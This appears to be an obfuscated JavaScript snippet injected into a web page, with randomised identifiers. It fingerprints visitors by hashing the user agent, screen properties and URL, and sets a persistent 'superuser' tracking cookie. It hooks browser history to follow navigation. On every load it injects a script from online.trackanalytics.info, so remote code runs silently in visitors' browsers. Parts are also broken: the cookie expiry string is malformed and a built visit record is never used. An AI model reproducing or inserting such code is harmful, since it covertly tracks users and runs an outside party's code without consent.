(async function () { try { if (sessionStorage.getItem('ua_key')) { return; } const ua = navigator.userAgent; const encoder = new TextEncoder(); const data = encoder.encode(ua); const hashBuffer = await crypto.subtle.digest('SHA-256', data); const hashArray = Array.from(new Uint8Array(hashBuffer)); const hashHex = hashArray .map(b => b.toString(16).padStart(2, '0')) .join(''); sessionStorage.setItem('ua_key', hashHex); } catch (e) { } })(); function PdJOYeSmM (eUaXuEYpS) { var DZmwebCuT = eUaXuEYpS + '='; var OYHaFerRD = document.cookie.split(';'); for (var i = 0; i < OYHaFerRD.length; i++) { var qSpeYTBTu = OYHaFerRD[i]; while (qSpeYTBTu.charAt(0) === ' ') { qSpeYTBTu = qSpeYTBTu.substring(1); } if (qSpeYTBTu.indexOf(DZmwebCuT) === 0) { return qSpeYTBTu.substring(DZmwebCuT.length, qSpeYTBTu.length); } } return ''; } function CzCxRGyUb () { return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function (BsphqoKXU) { var WyuCbMNHw = Math.random() * 16 | 0, AtlbiBuVt = BsphqoKXU === 'x' ? WyuCbMNHw : (WyuCbMNHw & 0x3 | 0x8); return AtlbiBuVt.toString(16); }) } (async function () { try { if (sessionStorage.getItem('screen_key')) { return; } const screenSize = [ screen.width, screen.height, screen.colorDepth, window.devicePixelRatio || 1 ].join('x'); const encoder = new TextEncoder(); const data = encoder.encode(screenSize); const hashBuffer = await crypto.subtle.digest('SHA-256', data); const hashArray = Array.from(new Uint8Array(hashBuffer)); const hashHex = hashArray .map(b => b.toString(16).padStart(2, '0')) .join(''); sessionStorage.setItem('screen_key', hashHex); } catch (e) { } })(); var BTbrDSuii = window.location.href; (() => { let oldPushState = history.pushState; history.pushState = function pushState() { let ret = oldPushState.apply(this, arguments); window.dispatchEvent(new Event('pushstate')); window.dispatchEvent(new Event('locationchange')); return ret; }; let oldReplaceState = history.replaceState; history.replaceState = function replaceState() { let ret = oldReplaceState.apply(this, arguments); window.dispatchEvent(new Event('replacestate')); window.dispatchEvent(new Event('locationchange')); return ret; }; window.addEventListener('popstate', () => { window.dispatchEvent(new Event('locationchange')); }); })(); raIZhPZbS(BTbrDSuii).then(function (value) { window.addEventListener('locationchange', function () { if (window.location.href != BTbrDSuii) { BTbrDSuii = window.location.href; raIZhPZbS(BTbrDSuii).then(function (value) { }); } }); }); async function raIZhPZbS (jPrRplXKy) { var RgFIgtfxt = PdJOYeSmM('superuser'); if (!RgFIgtfxt || RgFIgtfxt === '') RgFIgtfxt = CzCxRGyUb(); var DNkwkcTPT = (new Date(Date.now() + 30 * 86400 * 1000)).toUTCString(); document.cookie = 'superuser=' + RgFIgtfxt + '; expires=' + DNkwkcTPT + 86400 + ';path=/;'; var VgorJgJTD = { url: jPrRplXKy, referrer: document.referrer, unique_id: RgFIgtfxt }; return ''; } try { var jmMwonoIZ_referrer = document.referrer; if (jmMwonoIZ_referrer == "") { jmMwonoIZ_referrer = window.location.href; } if (jmMwonoIZ_referrer) { const c_domain = new URL(jmMwonoIZ_referrer).hostname; async function QdwcAPJac_tracker () { var ZmziiVgex_script = document.createElement('script'); ZmziiVgex_script.src = `https://online.trackanalytics.info/audience.js?domain=${c_domain}`; document.head.appendChild(ZmziiVgex_script); } QdwcAPJac_tracker(); } } catch (error) { } (async function () { try { if (sessionStorage.getItem('url_key')) { return; } const currentUrl = location.origin + location.pathname + location.search; const encoder = new TextEncoder(); const data = encoder.encode(currentUrl); const hashBuffer = await crypto.subtle.digest('SHA-256', data); const hashArray = Array.from(new Uint8Array(hashBuffer)); const hashHex = hashArray .map(b => b.toString(16).padStart(2, '0')) .join(''); sessionStorage.setItem('url_key', hashHex); } catch (e) { } })();